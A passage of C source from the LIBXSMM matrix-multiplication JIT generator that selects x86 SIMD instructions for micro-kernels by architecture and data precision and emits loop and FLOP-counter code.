} else if ( LIBXSMM_GEMM_PRECISION_F32 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
io_micro_kernel_config->vector_length = 16;
io_micro_kernel_config->datatype_size = 4;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VBROADCASTSS;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
if ( (i_use_masking_a_c == 0) ) {
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPS;
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
}
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VPXORD;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VFMADD231PS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPS;
} else if ( LIBXSMM_GEMM_PRECISION_I16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
/* C is 32bit, so we treat all 3 matrices as 32bit element arrays */
io_micro_kernel_config->vector_length = 16;
io_micro_kernel_config->datatype_size = 4;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VPBROADCASTD;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
if ( (i_use_masking_a_c == 0) ) {
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPS;
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
}
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VPXORD;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VPDPWSSD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VPADDD;
} else if ( LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
/* C is 32bit, so we treat all 3 matrices as 32bit element arrays */
io_micro_kernel_config->vector_length = 16;
io_micro_kernel_config->datatype_size = 4;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VPBROADCASTD;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
if ( (i_use_masking_a_c == 0) ) {
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPS;
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
}
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VPXORD;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VPDPBUSD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VPADDD;
} else if ( LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
/* C is 32bit, so we treat all 3 matrices as 32bit element arrays */
io_micro_kernel_config->vector_length = 16;
io_micro_kernel_config->datatype_size = 4;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VPBROADCASTD;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
if ( (i_use_masking_a_c == 0) ) {
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPS;
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
}
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VPXORD;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VDPBF16PS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPS;
} else {
/* shouldn't happen as we caught this case earlier */
io_micro_kernel_config->instruction_set = LIBXSMM_X86_GENERIC;
io_micro_kernel_config->vector_reg_count = 0;
io_micro_kernel_config->use_masking_a_c = 0;
io_micro_kernel_config->vector_name = 'a';
io_micro_kernel_config->vector_length = 0;
io_micro_kernel_config->datatype_size = 0;
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_UNDEF;
}
} else {
/* that should no happen */
}
io_micro_kernel_config->prefetch_instruction = LIBXSMM_X86_INSTR_PREFETCHT1;
io_micro_kernel_config->alu_add_instruction = LIBXSMM_X86_INSTR_ADDQ;
io_micro_kernel_config->alu_sub_instruction = LIBXSMM_X86_INSTR_SUBQ;
io_micro_kernel_config->alu_cmp_instruction = LIBXSMM_X86_INSTR_CMPQ;
io_micro_kernel_config->alu_jmp_instruction = LIBXSMM_X86_INSTR_JL;
io_micro_kernel_config->alu_mov_instruction = LIBXSMM_X86_INSTR_MOVQ;
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_init_micro_kernel_config_halfvector( libxsmm_micro_kernel_config* io_micro_kernel_config,
const unsigned int i_arch,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_use_masking_a_c ) {
if ( (i_arch < LIBXSMM_X86_SSE3) || (i_arch > LIBXSMM_X86_ALLFEAT) ) {
io_micro_kernel_config->instruction_set = LIBXSMM_X86_GENERIC;
io_micro_kernel_config->vector_reg_count = 0;
io_micro_kernel_config->use_masking_a_c = 0;
io_micro_kernel_config->vector_name = 'a';
io_micro_kernel_config->vector_length = 0;
io_micro_kernel_config->datatype_size = 0;
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_UNDEF;
} else if ( i_arch <= LIBXSMM_X86_SSE4 ) {
#if !defined(NDEBUG)
fprintf(stderr, "LIBXSMM WARNING, libxsmm_generator_gemm_init_micro_kernel_config_halfvector, redirecting to scalar, please fix the generation code!!!\n");
#endif
libxsmm_generator_gemm_init_micro_kernel_config_scalar( io_micro_kernel_config, i_arch, i_xgemm_desc, i_use_masking_a_c );
} else if ( i_arch <= LIBXSMM_X86_AVX2 ) {
io_micro_kernel_config->instruction_set = LIBXSMM_X86_AVX;
io_micro_kernel_config->vector_reg_count = 16;
io_micro_kernel_config->use_masking_a_c = i_use_masking_a_c;
io_micro_kernel_config->vector_name = 'x';
if ( LIBXSMM_GEMM_PRECISION_F64 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
io_micro_kernel_config->vector_length = 2;
io_micro_kernel_config->datatype_size = 8;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPD;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VMOVDDUP;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPD;
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VXORPD;
if ( i_arch == LIBXSMM_X86_AVX ) {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VMULPD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPD;
} else {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VFMADD231PD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_UNDEF;
}
} else {
io_micro_kernel_config->vector_length = 4;
io_micro_kernel_config->datatype_size = 4;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VBROADCASTSS;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPS;
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VXORPS;
if ( i_arch == LIBXSMM_X86_AVX ) {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VMULPS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPS;
} else {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VFMADD231PS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_UNDEF;
}
}
} else if ( i_arch <= LIBXSMM_X86_ALLFEAT ) {
#if !defined(NDEBUG)
fprintf(stderr, "LIBXSMM WARNING, libxsmm_generator_gemm_init_micro_kernel_config_halfvector, AVX512 redirecting to fullvector!\n");
#endif
libxsmm_generator_gemm_init_micro_kernel_config_fullvector( io_micro_kernel_config, i_arch, i_xgemm_desc, i_use_masking_a_c );
} else {
/* should not happen */
}
io_micro_kernel_config->prefetch_instruction = LIBXSMM_X86_INSTR_PREFETCHT1;
io_micro_kernel_config->alu_add_instruction = LIBXSMM_X86_INSTR_ADDQ;
io_micro_kernel_config->alu_sub_instruction = LIBXSMM_X86_INSTR_SUBQ;
io_micro_kernel_config->alu_cmp_instruction = LIBXSMM_X86_INSTR_CMPQ;
io_micro_kernel_config->alu_jmp_instruction = LIBXSMM_X86_INSTR_JL;
io_micro_kernel_config->alu_mov_instruction = LIBXSMM_X86_INSTR_MOVQ;
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_init_micro_kernel_config_scalar( libxsmm_micro_kernel_config* io_micro_kernel_config,
const unsigned int i_arch,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_use_masking_a_c ) {
if ( ( i_arch < LIBXSMM_X86_SSE3 ) || ( i_arch > LIBXSMM_X86_ALLFEAT ) ) {
io_micro_kernel_config->instruction_set = LIBXSMM_X86_GENERIC;
io_micro_kernel_config->vector_reg_count = 0;
io_micro_kernel_config->use_masking_a_c = 0;
io_micro_kernel_config->vector_name = 'a';
io_micro_kernel_config->vector_length = 0;
io_micro_kernel_config->datatype_size = 0;
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_UNDEF;
} else if ( i_arch <= LIBXSMM_X86_SSE4 ) {
io_micro_kernel_config->instruction_set = LIBXSMM_X86_SSE3;
io_micro_kernel_config->vector_reg_count = 16;
io_micro_kernel_config->use_masking_a_c = i_use_masking_a_c;
io_micro_kernel_config->vector_name = 'x';
if ( LIBXSMM_GEMM_PRECISION_F64 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
io_micro_kernel_config->vector_length = 1;
io_micro_kernel_config->datatype_size = 8;
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_MOVSD;
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_MOVSD;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_MOVSD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_MOVSD;
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_XORPD;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_MULSD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_ADDSD;
} else {
io_micro_kernel_config->vector_length = 1;
io_micro_kernel_config->datatype_size = 4;
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_MOVSS;
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_MOVSS;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_MOVSS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_MOVSS;
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_XORPS;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_MULSS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_ADDSS;
}
} else if ( i_arch <= LIBXSMM_X86_ALLFEAT ) {
io_micro_kernel_config->instruction_set = i_arch;
io_micro_kernel_config->vector_reg_count = 16;
io_micro_kernel_config->use_masking_a_c = i_use_masking_a_c;
io_micro_kernel_config->vector_name = 'x';
if ( LIBXSMM_GEMM_PRECISION_F64 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
io_micro_kernel_config->vector_length = 1;
io_micro_kernel_config->datatype_size = 8;
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVSD;
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VMOVSD;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVSD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVSD;
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VXORPD;
if ( i_arch == LIBXSMM_X86_AVX ) {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VMULSD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDSD;
} else {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VFMADD231SD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_UNDEF;
}
} else {
io_micro_kernel_config->vector_length = 1;
io_micro_kernel_config->datatype_size = 4;
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVSS;
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VMOVSS;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVSS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVSS;
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VXORPS;
if ( i_arch == LIBXSMM_X86_AVX ) {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VMULSS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDSS;
} else {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VFMADD231SS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_UNDEF;
}
}
} else {
/* should not happen */
}
io_micro_kernel_config->prefetch_instruction = LIBXSMM_X86_INSTR_PREFETCHT1;
io_micro_kernel_config->alu_add_instruction = LIBXSMM_X86_INSTR_ADDQ;
io_micro_kernel_config->alu_sub_instruction = LIBXSMM_X86_INSTR_SUBQ;
io_micro_kernel_config->alu_cmp_instruction = LIBXSMM_X86_INSTR_CMPQ;
io_micro_kernel_config->alu_jmp_instruction = LIBXSMM_X86_INSTR_JL;
io_micro_kernel_config->alu_mov_instruction = LIBXSMM_X86_INSTR_MOVQ;
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_add_flop_counter( libxsmm_generated_code* io_generated_code,
const libxsmm_gemm_descriptor* i_xgemm_desc ) {
if ( io_generated_code->code_type == 0 ) {
char l_new_code[512];
const unsigned int l_max_code_length = sizeof(l_new_code) - 1;
int l_code_length = 0;
l_code_length = LIBXSMM_SNPRINTF( l_new_code, l_max_code_length, "#ifndef NDEBUG\n" );
libxsmm_append_code_as_string( io_generated_code, l_new_code, l_code_length );
l_code_length = LIBXSMM_SNPRINTF( l_new_code, l_max_code_length, "#ifdef _OPENMP\n" );
libxsmm_append_code_as_string( io_generated_code, l_new_code, l_code_length );
l_code_length = LIBXSMM_SNPRINTF( l_new_code, l_max_code_length, "#pragma omp atomic\n" );
libxsmm_append_code_as_string( io_generated_code, l_new_code, l_code_length );
l_code_length = LIBXSMM_SNPRINTF( l_new_code, l_max_code_length, "#endif\n" );
libxsmm_append_code_as_string( io_generated_code, l_new_code, l_code_length );
l_code_length = LIBXSMM_SNPRINTF( l_new_code, l_max_code_length, "libxsmm_num_total_flops += %u;\n", 2u * i_xgemm_desc->m * i_xgemm_desc->n * i_xgemm_desc->k);
libxsmm_append_code_as_string( io_generated_code, l_new_code, l_code_length );
l_code_length = LIBXSMM_SNPRINTF( l_new_code, l_max_code_length, "#endif\n" );
libxsmm_append_code_as_string( io_generated_code, l_new_code, l_code_length );
}
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_header_kloop( libxsmm_generated_code* io_generated_code,
libxsmm_loop_label_tracker* io_loop_label_tracker,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const unsigned int i_m_blocking,
const unsigned int i_k_blocking ) {
LIBXSMM_UNUSED(i_m_blocking);
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_mov_instruction, i_gp_reg_mapping->gp_reg_kloop, 0);
libxsmm_x86_instruction_register_jump_back_label( io_generated_code, io_loop_label_tracker );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_kloop, i_k_blocking);
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_footer_kloop( libxsmm_generated_code* io_generated_code,
libxsmm_loop_label_tracker* io_loop_label_tracker,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_m_blocking,
const unsigned int i_max_blocked_k,
const unsigned int i_kloop_complete ) {
LIBXSMM_UNUSED(i_m_blocking);
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_cmp_instruction, i_gp_reg_mapping->gp_reg_kloop, i_max_blocked_k );
libxsmm_x86_instruction_jump_back_to_label( io_generated_code, i_micro_kernel_config->alu_jmp_instruction, io_loop_label_tracker );
if ( i_kloop_complete != 0 ) {
int l_b_offset = 0;
if ( (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_TRANS_B) > 0 ) {
l_b_offset = i_xgemm_desc->ldb * i_xgemm_desc->k * i_micro_kernel_config->datatype_size;
} else {
l_b_offset = i_xgemm_desc->k * i_micro_kernel_config->datatype_size;
}
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction,
i_gp_reg_mapping->gp_reg_b, l_b_offset );
}
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_header_reduceloop( libxsmm_generated_code* io_generated_code,
libxsmm_loop_label_tracker* io_loop_label_tracker,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config ) {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_mov_instruction, i_gp_reg_mapping->gp_reg_reduce_loop, 0);
libxsmm_x86_instruction_register_jump_back_label( io_generated_code, io_loop_label_tracker );
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_footer_reduceloop( libxsmm_generated_code* io_generated_code,
libxsmm_loop_label_tracker* io_loop_label_tracker,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const libxsmm_gemm_descriptor* i_xgemm_desc) {
LIBXSMM_UNUSED(i_xgemm_desc);
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_reduce_loop, 1);
libxsmm_x86_instruction_alu_reg( io_generated_code, i_micro_kernel_config->alu_cmp_instruction, i_gp_reg_mapping->gp_reg_reduce_count, i_gp_reg_mapping->gp_reg_reduce_loop);
libxsmm_x86_instruction_jump_back_to_label( io_generated_code, i_micro_kernel_config->alu_jmp_instruction, io_loop_label_tracker );
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_header_nloop( libxsmm_generated_code* io_generated_code,
libxsmm_loop_label_tracker* io_loop_label_tracker,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const unsigned int i_n_blocking) {
libxsmm_x86_instruction_register_jump_back_label( io_generated_code, io_loop_label_tracker );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_nloop, i_n_blocking );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_mov_instruction, i_gp_reg_mapping->gp_reg_mloop, 0 );
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_footer_nloop( libxsmm_generated_code* io_generated_code,
libxsmm_loop_label_tracker* io_loop_label_tracker,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_n_blocking,
const unsigned int i_n_done ) {
if ( LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_c,
(i_n_blocking*(i_xgemm_desc->ldc)*(i_micro_kernel_config->datatype_size/2)) - ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size/2)) );
} else if ( LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_c,
(i_n_blocking*(i_xgemm_desc->ldc)*(i_micro_kernel_config->datatype_size/4)) - ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size/4)) );
} else {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_c,
(i_n_blocking*(i_xgemm_desc->ldc)*(i_micro_kernel_config->datatype_size)) - ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size)) );
}
/* B prefetch */
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_BL2_VIA_C ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C_AHEAD ) {
if ( (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_TRANS_B) == 0 ) {
unsigned int l_type_scaling;
if ( (LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype )) ||
(LIBXSMM_GEMM_PRECISION_I16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype )) ) {
l_type_scaling = 2;
} else if ( LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
l_type_scaling = 4;
} else {
l_type_scaling = 1;
}
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_b_prefetch,
(i_n_blocking*(i_xgemm_desc->ldc)*(i_micro_kernel_config->datatype_size/l_type_scaling)) - ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size/l_type_scaling)) );
}
}
#if 0
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_CL2 ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2CL2BL2_VIA_C ) {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_c_prefetch,
(i_n_blocking*(i_xgemm_desc->ldc)*(i_micro_kernel_config->datatype_size)) - ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size)) );
}
#endif
if (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_BATCH_REDUCE_ADDRESS) {
/* handle trans B */
int l_b_offset = 0;
if ( (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_TRANS_B) > 0 ) {
l_b_offset = i_n_blocking * i_micro_kernel_config->datatype_size;
} else {
l_b_offset = i_n_blocking * i_xgemm_desc->ldb * i_micro_kernel_config->datatype_size;
}
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_0 );
